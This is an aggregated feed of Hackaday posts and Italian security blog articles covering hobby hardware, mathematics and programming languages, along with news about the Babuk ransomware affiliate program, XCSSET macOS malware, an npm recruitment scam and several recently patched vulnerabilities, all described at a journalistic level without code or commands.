Salta al contenuto principale

C+P: Combining the Usefulness of C with the Excellence of Prolog


In a move that will absolutely not over-excite anyone, nor lead to any heated arguments, [needleful] posits that their C Plus Prolog (C+P for short) programming language is the best possible language ever. This is due to it combining the best of the only good programming language (Prolog) with the best of the only useful programming language (C). Although the resulting mash-up syntax that results may trigger Objective-C flashbacks, it’s actually valid SWI-Prolog, that is subsequently converted to C for compilation.

Language flamewars aside, the motivation for C+P as explained in the project’s README was mostly the exploring of macros in a system programming language. More specifically, by implementing a language-within-a-language you can add just about any compile-time feature you want including – as demonstrated in C+P – a form of generics. Even as a way to have a bit of fun, C+P comes dangerously close to being a functional prototype. Its main flaw is probably the lack of validation and error messages, which likely leads to broken C being generated.

Also mentioned are the Nim and Haxe languages which can be compiled (transpiled) to C or C++, which is somewhat of a similar idea as C+P, as well as cmacro (based on Common Lisp) and the D language.


hackaday.com/2025/03/14/cp-com…


Babuk Locker 2.0: annuncia il nuovo programma di affiliazione ransomware


Babuk, uno dei gruppi ransomware più noti nel panorama del cybercrimine, ha lanciato il Babuk Locker 2.0 Affiliate Program 2025, un programma di affiliazione per hacker esperti che vogliono guadagnare con attacchi ransomware. Questo programma, pubblicato nel loro dataleak site, introduce nuove funzionalità avanzate e un modello più strutturato per chi vuole unirsi alla loro rete criminale.

Come funziona il programma


Babuk Locker 2.0 accetta affiliati da tutto il mondo, senza distinzione di lingua o provenienza, a patto che abbiano esperienza nel penetration testing e nella compromissione di sistemi informatici. Il loro obiettivo è chiaro: massimizzare i guadagni con attacchi mirati e gestire i riscatti in modo più efficace. La piattaforma permette agli affiliati di gestire in autonomia le comunicazioni con le vittime e le operazioni di estorsione.

Le novità della piattaforma


La nuova versione del Babuk Locker introduce diverse funzionalità per semplificare le operazioni dei cybercriminali, tra cui:

  • Pannello di controllo su Tor: un’interfaccia per gestire gli attacchi e negoziare i riscatti.
  • Chat con le vittime: sistema di messaggistica con notifiche e trasferimento file.
  • Verifica della decrittazione: possibilità di dimostrare alle vittime che il ransomware può effettivamente ripristinare i file.
  • Babuk Stealer: modulo per rubare dati prima della crittografia.
  • Upload automatico dei dati: gli affiliati possono caricare le informazioni rubate direttamente sul blog del gruppo.
  • Scanner di rete: per individuare risorse condivise nella rete della vittima.
  • Distribuzione automatica del ransomware: il malware si diffonde senza bisogno di script o configurazioni avanzate.


Quanto guadagnano gli affiliati


Babuk Locker 2.0 prevede una commissione fissa del 10% sui riscatti ricevuti dagli affiliati. Ogni affiliato può negoziare direttamente con la vittima e trasferire successivamente la percentuale dovuta al gruppo Babuk. Per garantire la serietà dei partecipanti, il programma richiede un deposito iniziale di 25.000 USD in Bitcoin, una strategia che serve a escludere infiltrati delle forze dell’ordine o investigatori sotto copertura.

Chi può essere attaccato e chi no


Babuk ha stabilito alcune regole sugli obiettivi da colpire:

  • Divieto di attacchi a infrastrutture critiche: centrali nucleari, ospedali pubblici e organizzazioni post-sovietiche sono off-limits.
  • Obiettivi permessi: aziende private, istituzioni educative a scopo di lucro, case farmaceutiche e cliniche estetiche.
  • Attacchi incoraggiati: forze di polizia e agenzie governative impegnate nella lotta ai cybercriminali.


Conclusione


Il Babuk Locker 2.0 Affiliate Program 2025 dimostra quanto il modello ransomware stia diventando sofisticato e organizzato. Con strumenti sempre più avanzati e una gestione diretta delle negoziazioni, il gruppo Babuk si posiziona come uno dei più pericolosi attori del panorama cybercriminale. Per le aziende, rimanere vigili e rafforzare le misure di sicurezza è l’unica strada per contrastare queste minacce sempre più aggressive.

L'articolo Babuk Locker 2.0: annuncia il nuovo programma di affiliazione ransomware proviene da il blog della sicurezza informatica.


XCSSET: Il malware invisibile che minaccia gli sviluppatori macOS


Microsoft Threat Intelligence ha recentemente scoperto una nuova variante di XCSSET, un malware sofisticato progettato per infettare i progetti Xcode su macOS. Questa versione aggiornata introduce miglioramenti significativi nell’offuscamento del codice, nelle tecniche di persistenza e nelle strategie di infezione, aumentando la capacità del malware di eludere i controlli di sicurezza e compromettere i sistemi degli sviluppatori. La minaccia si presenta particolarmente pericolosa a causa della sua natura modulare e della capacità di esfiltrare informazioni sensibili, inclusi file personali, credenziali e persino dati relativi a portafogli digitali.

Una minaccia persistente e in evoluzione


XCSSET è stato inizialmente individuato nel 2020 come un malware capace di infettare progetti Xcode, colpendo gli sviluppatori macOS in modo subdolo. La sua strategia di attacco prevedeva la modifica dei file associati ai progetti di sviluppo, diffondendosi automaticamente agli utenti che scaricavano e compilavano il codice infetto.

La nuova variante, la prima rilevata dal 2022, presenta caratteristiche avanzate rispetto alle precedenti versioni. Oltre a implementare tecniche di offuscamento più raffinate, il malware utilizza nuovi meccanismi di persistenza, il che gli permette di rimanere attivo anche dopo il riavvio del sistema. Inoltre, è stata osservata una maggiore modularità del codice, il che suggerisce che gli autori di XCSSET abbiano sviluppato un framework scalabile per distribuire payload malevoli personalizzati.

Analisi della struttura dell’attacco: interpretazione dell’immagine allegata


L’immagine allegata fornisce una rappresentazione visiva della complessa infrastruttura di XCSSET, evidenziando i suoi molteplici punti di contatto e interconnessioni con moduli malevoli, server di comando e controllo (C2) e metodi di infezione.

  • Nucleo centrale (XCSSET): Al centro della mappa si trova il nodo principale, che rappresenta il malware XCSSET, da cui si diramano le connessioni verso varie componenti e meccanismi di attacco.
  • Connessioni ai server C2: Le linee che si estendono verso destra collegano XCSSET a numerosi domini dannosi e server di comando e controllo. Questi server fungono da centri di gestione per il malware, consentendo agli attaccanti di inviare comandi, aggiornare i moduli malevoli e raccogliere dati rubati.
  • Metodi di persistenza e infezione: Le connessioni sulla sinistra illustrano le tecniche di persistenza utilizzate da XCSSET, come la modifica dei file di configurazione della shell (zshrc), la compromissione delle build di Xcode e l’abuso di strumenti legittimi per garantirne la sopravvivenza nel sistema infetto.
  • Target e vettori di attacco: Nella parte destra dell’immagine emergono numerosi obiettivi e moduli infettati, suggerendo una strategia di attacco altamente scalabile, in grado di colpire sviluppatori macOS in tutto il mondo. La presenza di più moduli dimostra la natura modulare del malware e la capacità degli attaccanti di aggiornarlo con nuove funzionalità.

L’analisi dell’immagine evidenzia l’architettura sofisticata di XCSSET e il modo in cui riesce a distribuire le proprie componenti in modo efficace, rendendo la sua individuazione e rimozione estremamente complessa.

Tecniche avanzate di offuscamento e struttura modulare


Uno degli aspetti più insidiosi di questa nuova variante è l’adozione di un sistema di offuscamento più sofisticato. I nomi dei moduli sono stati mascherati per rendere più difficile l’analisi statica, mentre l’uso intensivo di linguaggi di scripting e binari legittimi consente al malware di operare in modo discreto.

La struttura modulare del malware permette agli attaccanti di aggiornare le funzionalità senza dover distribuire una nuova versione completa, aumentando la flessibilità e la longevità della minaccia. Tra le capacità identificate troviamo:

  • Decodifica e esecuzione di payload offuscati per evitare il rilevamento da parte degli antivirus.
  • Uso esteso di comandi UNIX per garantire compatibilità con i sistemi macOS.
  • Sfruttamento di strumenti legittimi per l’esecuzione del codice malevolo, riducendo il rischio di essere individuato dagli strumenti di sicurezza.


Tecniche di persistenza migliorate


Per garantire la sopravvivenza nel sistema infetto, XCSSET implementa tre diverse tecniche di persistenza:

  1. Modifica del file di configurazione della shell Zsh (metodo “zshrc”): Il malware inietta codice malevolo nel file di configurazione della shell, facendo sì che venga eseguito automaticamente ogni volta che un utente apre una nuova sessione terminale.
  2. Abuso dello strumento DockUtil (metodo “dock”): XCSSET scarica e utilizza DockUtil, uno strumento firmato legittimamente, per modificare le impostazioni del Dock di macOS. Viene creata un’applicazione falsa con il nome di Launchpad, che esegue sia la versione autentica dell’applicazione che il malware.
  3. Infezione del processo Git (metodo “git”): Il codice malevolo viene iniettato nei flussi di lavoro Git, assicurando che il malware venga eseguito durante le operazioni di commit.


Conclusione e misure di mitigazione


L’evoluzione di XCSSET dimostra come le minacce informatiche siano in costante cambiamento, adottando nuove strategie per eludere i controlli di sicurezza. Per mitigare i rischi associati a questa minaccia, gli sviluppatori dovrebbero adottare le seguenti precauzioni:

  • Verificare sempre l’integrità dei progetti Xcode prima di compilarli.
  • Utilizzare strumenti di sicurezza aggiornati per identificare eventuali anomalie.
  • Monitorare il traffico di rete per individuare comunicazioni sospette con server C2.
  • Limitare l’uso di script non verificati all’interno dei progetti di sviluppo.

L’analisi condotta da Microsoft Threat Intelligence sottolinea l’importanza di mantenere elevati livelli di sicurezza informatica, soprattutto in ambienti di sviluppo. Gli sviluppatori macOS devono essere consapevoli delle minacce emergenti e adottare misure proattive per proteggere il proprio codice e i propri sistemi da attacchi sofisticati come XCSSET.

L'articolo XCSSET: Il malware invisibile che minaccia gli sviluppatori macOS proviene da il blog della sicurezza informatica.


Pi Hand is a Digital Display of a Different Sort


Hackers enjoy a good theme, and so it comes as no surprise that every time March 14th (Pi Day) rolls around, the tip line sees an uptick in mathematical activity. Whether it’s something they personally did or some other person’s project they want to bring to our attention, a lot of folks out there are very excited about numbers today.

One of our most prolific circumference aficionados is [Cristiano Monteiro], who, for the last several years, has put together a special project to commemorate the date. For 2025, he’s come up with a robotic hand that will use its fingers to show the digits of Pi one at a time. Since there’s only one hand, anything higher than five will be displayed as two gestures in quick succession, necessitating a bit of addition on the viewer’s part.

[Cristiano] makes no claims about the anatomical accuracy of his creation. Indeed, if your mitts look anything like this, you should seek medical attention immediately. But whether you think of them as fingers or nightmarish claws, it’s the motion of the individual digits that matter.

To that end, each one is attached to an MG90 servo, which an Arduino Nano drives with attached Servo Shield. From there, it’s just a matter of code to get the digits wiggling out the correct value, which [Cristiano] has kindly shared for anyone looking to recreate this project.

If you’re hungry for more Pi, the ghostly display that [Cristiano] sent in last year is definitely worth another look. While not directly related to today’s mathematical festivities, the portable GPS time server he put together back in 2021 is another fantastic build you should check out.

youtube.com/embed/zKS8LcoMIho?…


hackaday.com/2025/03/14/pi-han…


Hackaday Podcast Episode 312: Heart Attacks, the Speed of Light, and Self-balancing


Elliot does the podcast on the road to Supercon Europe, and Al is in the mood for math and nostalgia this week. Listen in and find out what they were reading on Hackaday this week.

The guys talked about the ESP-32 non-backdoor and battery fires. Then it was on to the hacks.

Self-balancing robots and satellite imaging were the appetizers, but soon they moved on to Kinect cameras in the modern day. Think you can’t travel at the speed of light? Turns out that maybe you already are.

Did you know there was a chatbot in 1957? Well, sort of. For the can’t miss stories: watches monitor your heart and what does the number e really mean?

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!

html5-player.libsyn.com/embed/…

Download in DRM-free MP3 and stream it on the big speakers.

Where to Follow Hackaday Podcast

Places to follow Hackaday podcasts:



Episode 312 Show Notes:

News:



What’s that Sound?


  • We had a ton of answers this week, and many of them were correct. It was a disposable film camera being wound and shot. Congratulations to [Bobby Tables] for getting the correct answer and winning the webcam-driven dice toss.


Interesting Hacks of the Week:



Quick Hacks:



Can’t-Miss Articles:



hackaday.com/2025/03/14/hackad…


You Know Pi, But Do You Really Know E?


Pi Day is here! We bet that you know that famous constant to a few decimal points, and you could probably explain what it really means: the ratio of a circle’s circumference to its diameter. But what about the constant e? Sure, you might know it is a transcendental number around 2.72 or so. You probably know it is the base used for natural logarithms. But what does it mean?

The poor number probably needed a better agent. After all, pi is a fun name, easy to remember, with a distinctive Greek letter and lots of pun potential. On the other hand, e is just a letter. Sometimes it is known as Euler’s number, but Leonhard Euler was so prolific that there is also Euler’s constant and a set of Euler numbers, none of which are the same thing. Sometimes, you hear it called Napier’s constant, and it is known that Jacob Bernoulli discovered the number, too. So, even the history of this number is confusing.

But back to math, the number e is the base rate of growth for any continually growing process. That didn’t help? Well, consider that many things grow or decay through growth. For example, a bacteria culture might double every 72 hours. Or a radioactive sample might decay a certain amount per century.

Classic


The classic example is compound interest. Suppose you have $100, and you put it in the bank for a 10% per year return (please tell us where we can find that, by the way). So at the end of the year, we have $110, right? But what if you compound it every six months?

To figure that out, you look at the $100 after six months. The annual interest on the money is still $10, but we are only at 6 months, so prorated, that $5. Therefore, after six months, we have $105. At the end of the year, we look at the 10% of $105 ($10.50). That’s still for a year, so we need to halve it ($5.25) and add it in ($105+105.25=110.25). So, compounding every six months means we get an extra quarter compared to simple interest.

What if it was compounded monthly? Now, we divide our interest by 12, but we have a little more money every month. After the first month, we have $100.83 ($100.00 + 10/12). The second month’s net is $101.67. By the end of the year, you have $110.47. Not quite twice as much extra as you had before.

So what if you could compound weekly? Or daily? Or hourly? Generally, you’ll get more, at least up to a point. Eventually, the interest will be split up so much that it will balance the increase and, at that point, you won’t make any more. There is an upper limit to how much money we can have at the end of the year at 10%, no matter how often you compound the interest.

So Where’s e?


Assume you could get a 100% return on your money (definitely let us know how to do that). That means if you go for a year, that’s a return of 2 — you double your money. But if you split the year in half and compound, you get 2.25 times the original amount. You can try a few more splits, and you’ll find the equation for growth is (1+1/n)[sup]n[/sup]. That is, if you only compute it once (n=1), you get double (1+1). If you compute interest twice, you get 2.25 (that is, (1+1/2)[sup]2[/sup]).

If you set n to 1,000, the return will be 2.7169. That’s even better than 2.25. So 100,000 should be wildly better, right? Not so much. At 100,000 you get a 2.71814 return. At 10,000,000 the rate is 2.71828 (or so).

Look at those numbers. Going from 1,000 to 10,000,000 only increases yield by about 0.001. If you know calculus, you might know how to take the limit of the growth equation. If not, you can still see it is going to top off at around 2.718. Those are the first digits of e.

Of course, e is like pi — transcendental — so you can’t ever get all the digits. You just keep getting closer and closer to the actual value. But 2.718 is pretty close for practical purposes.

Scaling


We can scale e to whatever problem we have at hand. We just have to be mindful of the starting amount, the rate, and what a time period means. For example, to work with our 10% rate (instead of 100%) we have to consider the rate e0.10 or about 1.105. Then, to scale for amounts, we have to multiply by the rate. So remember our $100 at 10% example? Our maximum return is 100 x 1.105 = 110.50. Why did we only get $110.47? Because we compounded 12 times. The $110.50 result is the maximum.

More Years


You can also multiply the rate by the number of periods. So if we left the money in for five years: 100 x e(0.10 x 5). If you think about it, then, making 50% for one year has the same maximum as making 10% for 5 years (or 25% for 2 years).

Negative Growth?


Suppose you have 120 grams of some radioactive material that decays at a rate of 50% per year. How much will be left after three years? Simplistically, it seems like the answer is that it will be depleted after two years. But that’s not true.

Just as compounding adds more money, a decay rate removes some of the radioactive material, meaning the absolute decay rate gets slower and slower with time because it is a percentage of the radioactive material’s mass.

Just for the sake of an example, suppose at some imaginary small period, the sample is at 100 grams and, thus, the decay rate is 50 grams/year. Later, the sample is at 80 grams. The decay rate is 40 grams/year, so it will take longer to go from 80 to 60 than it did to go from 100 to 80.

In this case, the rate is negative, so the formula will be 120 x e[sup](-0.5 x 3)[/sup]. That means you will have about 26.8 grams of radioactive material left in three years.

Modeling


Consider the classic equation for an RC circuit: Vc=Vs(1-e[sup](-t/(RC))[/sup]). Here, Vc is the capacitor voltage, Vs is the supply voltage, t is in seconds, and RC is the product of the resistance in ohms and the capacitance in farads.

What can we infer from this? Well, you could also write this as: Vc=Vs-Vs x e[sup](-t/(RC))[/sup]. Looking at our earlier model for money, it is plain that Vs is the voltage we start with, t is the time, and rate is -1/RC (time can’t be negative, after all). That makes sense because RC is the time constant in seconds, so 1/RC is the rate per second. The formula tells us how much voltage is charged in the capacitor, and subtracting that from Vs gives us the voltage drop across the capacitor.

Think about this circuit:

At t=0, we have Vs(1-e0), which is 0. At t=0.5, the voltage should be about 7.86V; at t=1, it should be up to 10.57V. As you can see, the simulation matches the math well enough.

Discharging is nearly the same: Vc=V0 x e[sup](-t/(RC))[/sup]. Obviously, V0 is the voltage you started with and, again -1/RC is the rate.

So Now You Know!


There’s a common rule of thumb that after a time period (RC) a capacitor will charge to about 63% or discharge to about 37%. Now that you know the math, you can see that e[sup]-1[/sup]=0.37 and 1-e[sup]-1[/sup]=0.63. If you want to do the actual math, you can always set up a spreadsheet.

Anything that grows or shrinks exponentially is a candidate for using an equation involving e. That’s why it is a common base for logarithms. Of course, most slide rules use logarithms, but not all of them do.

(Title image showing e living in pi’s shadow adapted from “Pi” by [Taso Katsionis] via Unsplash.)


Utah’s FORGE: a Research Laboratory For Enhanced Geothermal Systems


Geothermal heat is a tantalizing source of energy that’s quite literally right below our feet. At the same time geothermal energy is hard to develop as the Earth’s crust is too thick in most places, limiting this to areas where magma is close enough to the surface and the underground rock permeable enough for water. The Utah FORGE facility is a field site were researchers are developing and testing ways to increase the scope of geothermal energy.

An Enhanced Geothermal System (EGS) is designed to be capable of using geothermal energy where this is normally not feasible through a technique that’s reminiscent of the hydraulic fracturing (‘fracking’) used by the oil and gas industry, but rather than creating more fractures, it instead uses hydro-shearing to prop open existing fractures and thus create the through-flow of water needed to extract geothermal energy.

So far FORGE has reported the successful creation of a geothermal reservoir where before there was none. This facility is located in the Milford valley in southwest Utah, which has some hydrothermal activity at the nearby Roosevelt Hot Springs, but through EGS other parts of this valley and similar areas could conceivably be used for generating electricity and for community heating as well. In a 2024 study by University of Utah scientists, it is described how the Milford valley’s volcanic past has left a large body of magma below a thick barrier of granitic rock that could provide access to geothermal resources with EGS to create the requisite fluid permeability.

FORGE is not the only facility working on EGS, but many other sites around the world having ceased activities after issues ranging from induced seismicity, susceptibility to earthquakes and budget shortages. Much like fracking, EGS is likely to cause earthquakes. Whether EGS can be made economically feasible still remains to be seen.


hackaday.com/2025/03/14/utahs-…


This Week in Security: The X DDoS, The ESP32 Basementdoor, and the camelCase RCE


We would be remiss if we didn’t address the X Distributed Denial of Service (DDoS) attack that’s been happening this week. It seems like everyone is is trying to make political hay out of the DDoS, but we’re going to set that aside as much as possible and talk about the technical details. Elon made an early statement that X was down due to a cyberattack, with the source IPs tracing back to “the Ukraine area”.

The latest reporting seems to conclude that this was indeed a DDoS, and a threat group named “Dark Storm” has taken credit for the attack. Dark Storm does not seem to be of Ukrainian origin or affiliation.

We’re going to try to read the tea leaves just a bit, but remember that about the only thing we know for sure is that X was unreachable for many users several times this week. This is completely consistent with the suspected DDoS attack. The quirk of modern DDoS attacks is that the IP addresses on the packets are never trustworthy.

There are two broad tactics used for large-scale DDoS attacks, sometimes used simultaneously. The first is the simple botnet. Computers, routers, servers, and cameras around the world have been infected with malware, and then remote controlled to create massive botnets. Those botnets usually come equipped with a DDoS function, allowing the botnet runner to task all the bots with sending traffic to the DDoS victim IPs. That traffic may be UDP packets with spoofed or legitimate source IPs, or it may be TCP Synchronization requests, with spoofed source IPs.

The other common approach is the reflection or amplification attack. This is where a public server can be manipulated into sending unsolicited traffic to a victim IP. It’s usually DNS, where a short message request can return a much larger response. And because DNS uses UDP, it’s trivial to convince the DNS server to send that larger response to a victim’s address, amplifying the attack.

Put these two techniques together, and you have a botnet sending spoofed requests to servers, that unintentionally send the DDoS traffic on to the target. And suddenly it’s understandable why it’s so difficult to nail down attribution for this sort of attack. It may very well be that a botnet with a heavy Ukrainian presence was involved in the attack, which at the same time doesn’t preclude Dark Storm as the originator. The tea leaves are still murky on this one.

That ESP32 Backdoor


As Maya says, It Really Wasn’t a backdoor. The Bleeping Computer article and Tarlogic press release have both been updated to reflect the reality that this wasn’t really a backdoor. Given that the original research and presentation were in Spanish, we’re inclined to conclude that the “backdoor” claim was partially a translation issue.

The terminology storm set aside, what researchers found really was quite interesting. The source of information was official ESP32 binaries that implement the Bluetooth HCI, the Host Controller Interface. It’s a structured format for talking to a Bluetooth chip. The official HCI has set aside command space for vendor-specific commands. The “backdoor” that was discovered was this set of undocumented vendor-specific commands.

These commands were exposed over the HCI interface, and included low-level control over the ESP32 device. However, for the vast majority of ESP32 use cases, this interface is only available to code already running on the device, and thus isn’t a security boundary violation. To Espressif’s credit, their technical response does highlight the case of using an ESP32 in a hosted mode, where an external processor is issuing HCI commands over something like a serial link. In that very narrow case, the undocumented HCI commands could be considered a backdoor, though still requires compromise of the controlling device first.

All told, it’s not particularly dangerous as a backdoor. It’s a set of undocumented instructions that expose low-level functions, but only from inside the house. I propose a new term for this: a Basementdoor.

The Fake Recruitment Scam


The fake recruitment scam isn’t new to this column, but this is the first time we’ve covered a first-hand account of it. This is the story of [Ron Jansen], a freelance developer with impressive credentials. He got a recruiter’s message, looking to interview him for a web3 related position. Interviews often come with programming tasks, so it wasn’t surprising when this one included instructions to install something from Github using npm and do some simple tasks.

But then, the recruiter and CTO both went silent, and [Ron] suddenly had a bad feeling about that npm install command. Looking through the code, it looked boring, except for the dependency NPM package, process-log. With only 100-ish weekly downloads, this was an obvious place to look for something malicious. It didn’t disappoint, as this library pulled an obfuscated blob of JSON code and executed it during install. The deobfuscated code establishes a websocket connection, and uploads cookies, keychains, and any other interesting config or database files it can find.

Once [Ron] new he had been had, he started the infuriating-yet-necessary process of revoking API keys, rotating passwords, auditing everything, and wiping the affected machine’s drive. The rest of the post is his recommendations for how to avoid falling for this scam yourself. The immediate answer is to run untrusted code in a VM or sandbox. There are tools like Deno that can also help, doing sandboxing by default. Inertia is the challenge, with a major change like that.

Camel CamelCase RCE


Apache Camel is a Java library for doing Enterprise Integration Patterns. AKA, it’s network glue code for a specific use case. It sends data between endpoints, and uses headers to set certain options. One of the important security boundries there is that internal headers shouldn’t be set by outside sources. To accomplish that, those headers are string compared with Camel and org.apache.camel as the starting characters. The problem is that the string comparison is exact, while the header names themselves are not case sensitive. It’s literally a camelCase vulnerability. The result is that all the internal headers are accessible from any client, via this case trickery.

The vulnerability has been fixed in the latest release of Camel. The seriousness of this vulnerability depends on the component being connected to. Akamai researchers provided a sample application, where the headers were used to construct a command. The access to these internal values makes this case an RCE. This ambiguity is why the severity of this vulnerability is disputed.

Bits and Bytes


Researchers at Facebook have identified a flaw in the FreeType font rending library. It’s a integer underflow leading to a buffer overflow. An attacker can specify a very large integer value, and the library will add to that variable during processing. This causes the value to wrap around to a very small value, resulting in a buffer much too small to hold the given data. This vulnerability seems to be under active exploitation.

We don’t normally see problems with a log file leading to exploitation, but that seems to be the situation with the Below daemon. The service runs as root, and sets the logfile to be world readable. Make that logfile a symlink to some important file, and when the service starts, it overwrites the target file’s permissions.

Microsoft’s Patch Tuesday includes a whopping six 0-day exploits getting fixed this month. Several of these are filesystem problems, and at least one is an NTFS vulnerability that can be triggered simply by plugging in a USB drive.

The ruby-saml library had a weird quirk: it used two different XML parsers while doing signature validations. That never seems to go well, and this is not any different. It was possible to pack two different signatures into a single XML document, and the two different parsers would each see the file quite differently. The result was that any valid signature could be hijacked to attest as any other user. Not good. An initial fix has already landed, with a future release dropping one of the XML parsers and doing a general security hardening pass.


hackaday.com/2025/03/14/this-w…


ClockworkPi Unveils New PicoCalc Handheld


Do you like scientific calculators? Don’t bother answering that question, you’re reading Hackaday so we already know the answer. We also know you’re a fan of building things yourself and open source, which makes us fairly sure you’ll be just as interested in the recently announced ClockworkPi PicoCalc as we are.

On the surface, it looks like a chunky scientific calculator, though on further inspection you’ll note it comes equipped with a QWERTY keyboard. But open up the case and what you’ve really got is an elaborate carrier board for the Raspberry Pi Pico. The PicoCalc supports all variants of the microcontroller, but realistically we can’t think of any reason that you wouldn’t just use the latest version.

With the MCU connected, you’ll have access to the PicoCalc’s 320×320 4-inch IPS screen, backlit I2C-connected keyboard, SD card slot, 8 MB PSRAM, and dual PWM speakers. Power is provided by a pair of 18650 cells (which you’ll need to supply on your own), and the board has the necessary circuitry to charge them up over USB-C.

Everything is housed in an injection molded case, but the project page says all the necessary CAD files will be eventually be released under the GPL v3 so you can 3D print or CNC your own enclosure. For now though, the only thing of note that seems to be in the PicoCalc GitHub repository is a PCB schematic.

The software side of things is a little less clear. The page mentions a BASIC interpreter, MP3 playback, and support for various programming languages, but we get the impression that’s just a list of stuff you can run on the Pi Pico. There are a few images that clearly show the PicoCalc actually being used as a calculator however, so there may be an official firmware yet to be revealed.

The PicoCalc kit is on sale now, and will set you back $75 USD — which actually includes a first-generation Pi Pico, on the off chance that you don’t already have a few laying around. We’ve been impressed with the previous offerings from ClockworkPi, so assuming this new kit maintains that same build quality, it seems like a fair enough price.


hackaday.com/2025/03/14/clockw…


The Trials and Tribulations of Building a Pasta Display


We love unique displays here at Hackaday. If you can figure out how to show information on some weird object, we’re all about it. So when [Julius Curt] wrote in to share his work on the Pasta Analog Display, we were hooked from the subject line.

But in reading his account, it ended up being even better than we hoped for. Because it turns out, getting pasta to behave properly in an electromechanical device is trickier than you might think. Oh sure, as [Julius] points out, those ridges on the side of penne might make them look like gears — but after spending the time and effort to build a particularly slick 3D printed frame to actually use them as such, it turns out they just won’t cooperate. You’d think the pasta makers of the world would have some respect for mechanical tolerances, but unfortunately not.

This version of the pasta display didn’t work, but we love the design.
So if [Julius] couldn’t use the natural shape of the penne to get them to rotate, what was the alternative? First, he switched to the far larger cannelloni. Their increased internal volume, most commonly used to hold spinach and ricotta, has in this case been stuffed with a 3D printed armature. Thus each cannelloni is physically attached to a gear, which means when one of them is rotated by a 28BYJ-48 stepper motor, the rest follow.

All that’s left is to apply some artwork to the pasta (again, easier said than done), and rotate them into position. Depending on how much you can cram onto each cannelloni, the display can be rotated to show several different messages. In the video below, [Julius] shows off three distinct images rendered at the push of a button.

If you get hungry while trying to turn pasta into a workable display medium, you can always cook and eat some of your building materials. Luckily, a couple years ago Barilla released the design for an open source device to help you cook their pasta more efficiently.

youtube.com/embed/mlT0Z5JhcTU?…


hackaday.com/2025/03/14/the-tr…


Una PE in Microsoft Windows sfruttata da 2 anni Nel Patch Tuesday. Aggiornare avverte CISA e ACN


All’interno del Patch Tuesday di marzo è stata inclusa la CVE-2025-24983, una Vulnerabilità di elevazione dei privilegi del sottosistema kernel Win32 di Microsoft Windows.

La Cybersecurity and Infrastructure Security Agency (CISA) ha aggiunto due nuove vulnerabilità al suo catalogo delle vulnerabilità note sfruttate, una delle quali è il CVE-2025-24983, il quale risulta sfruttato attivamente dagli attaccanti. Stessa cosa ha fatto lo CSIRT dell’Agenzia della cybersicurezza nazionale ACN con un bollettino specifico che comprende anche questa CVE.

Secondo l’azienda di sicurezza informatica ESET, che ha scoperto e segnalato la vulnerabilità, gli aggressori sfruttano questa falla in natura da marzo 2023, rendendola uno degli exploit attivi più longevi prima della correzione.

Il bug di sicurezza è presente nel sottosistema del kernel Win32 di Windows ed è stata classificata come debolezza di tipo use-after-free (UAF) che consente agli aggressori con privilegi bassi di elevare i privilegi a quelli di SYSTEM senza richiedere l’interazione dell’utente.

Nonostante il suo impatto significativo, Microsoft ha classificato la vulnerabilità come “Importante” anziché “Critica” a causa dell’elevata complessità dello sfruttamento, che richiede agli aggressori di trovarsi di fronte ad una race condition.

“La vulnerabilità è un tipo di vulnerabilità use-after-free nel driver Win32k”, ha spiegato ESET nella sua analisi tecnica. In un certo scenario ottenuto utilizzando l’API WaitForInputIdle, la struttura W32PROCESS viene dereferenziata una volta in più del dovuto, causando UAF.”

Il ricercatore ESET Filip Jurčacko, che ha scoperto l’exploit, ha scoperto che questo veniva diffuso tramite una backdoor sofisticata nota come PipeMagic.

L'articolo Una PE in Microsoft Windows sfruttata da 2 anni Nel Patch Tuesday. Aggiornare avverte CISA e ACN proviene da il blog della sicurezza informatica.


The Mysterious and Important Work of Prop Design on Severance


Have you seen Severance? Chances are good that you have; the TV series has become wildly popular in its second season, to the point where the fandom’s dedication is difficult to distinguish from the in-universe cult of [Kier]. Part of the show’s appeal comes from its overall aesthetic, which is captured in this description of the building of one of the show’s props.

A detailed recap of the show is impossible, but for the uninitiated, a mega-corporation called Lumon has developed a chip that certain workers have implanted in their brains to sever their personalities and memories into work and non-work halves. The working “Innies” have no memory of what their “Outies” do when they aren’t at work, which sounds a lot better than it actually ends up being. It’s as weird as it sounds, and then some.

The prop featured here is the “WoeMeter” from episode seven of season two, used to quantify the amount of woe in a severed worker — told you it was weird. The prop was built by design house [make3] on a short timeline and after seeing only some sketches and rough renders from the production designers, and had to echo the not-quite-midcentury modern look of the whole series. The builders took inspiration from, among other things, a classic Nagra tape recorder, going so far as to harvest its knobs and switches to use in the build. The controls are all functional and laid out in a sensible way, allowing the actors to use the device in a convincing way. For visual feedback, the prop has two servo-operated meters and a string of seven-segment LED displays, all controlled by an ESP-32 mounted to a custom PCB. Adding the Lumon logo to the silkscreen was a nice touch.

The prop maker’s art is fascinating, and the ability to let your imagination run wild while making something that looks good and works for the production has got to be a blast. [make3] really nailed it with this one.

Thanks to [Aaron’s Outie] for the tip.


hackaday.com/2025/03/13/the-my…


Tracking Deep-Sky Objects


Astrophotography, and astronomy in general, takes some fairly specialized tools and a high amount of precision. Setting up the equipment can also take a lot of time, especially for amateurs traveling to various locations with their equipment, so anything that can reduce the amount of time spent looking for objects and increasing the amount of time looking at them is a welcome addition, especially since nights where conditions are ideal for these activities can be rare. [Anton] developed this real-time tracking tool for deep sky objects (DSOs) to keep tabs on most of the interesting things out there a telescope can be pointed at.

[Anton] calls his tool the Nova DSO Altitude Tracker and gets its information from SIMBAD, updating every minute for a given location on the planet. With that location data, the program calculates altitude and azimuth for various objects and also helps the user keep track of other important variables like moon illumination and angle above the horizon. It also allows the user to highlight specific objects of interest, making sure they are front and center throughout the session. Each DSO can be selected from a list to display detailed information about it such as its path, time visible in the sky, and other properties.

To get the program running, essentially all that’s required is a computer capable of running Python and a display of some sort. From there it provides a quick view of the best objects to point one’s telescope or camera at without any guesswork. With all of the code available it shouldn’t be too much of a leap to do other things with the underlying software, either, such as tying it into a tracker of some sort like this DIY telescope tracking device we featured a while back.


hackaday.com/2025/03/13/tracki…


BritCSS: Write CSS With British English Spellings


Everyone knows that there is only one proper English, with the rest being mere derivatives that bastardize the spelling and grammar. Despite this, the hoodlums who staged a violent uprising against British rule in the American colonies have somehow made their uncouth dialect dominant in the information technologies that have taken the world by storm these past decades. In this urgent mission to restore the King’s English to its rightful place, we fortunately have patriotic British citizens who have taken it upon themselves to correct this grave injustice. Brave citizens such as [Declan Chidlow], whose BritCSS project is a bright beacon in these harrowing times.

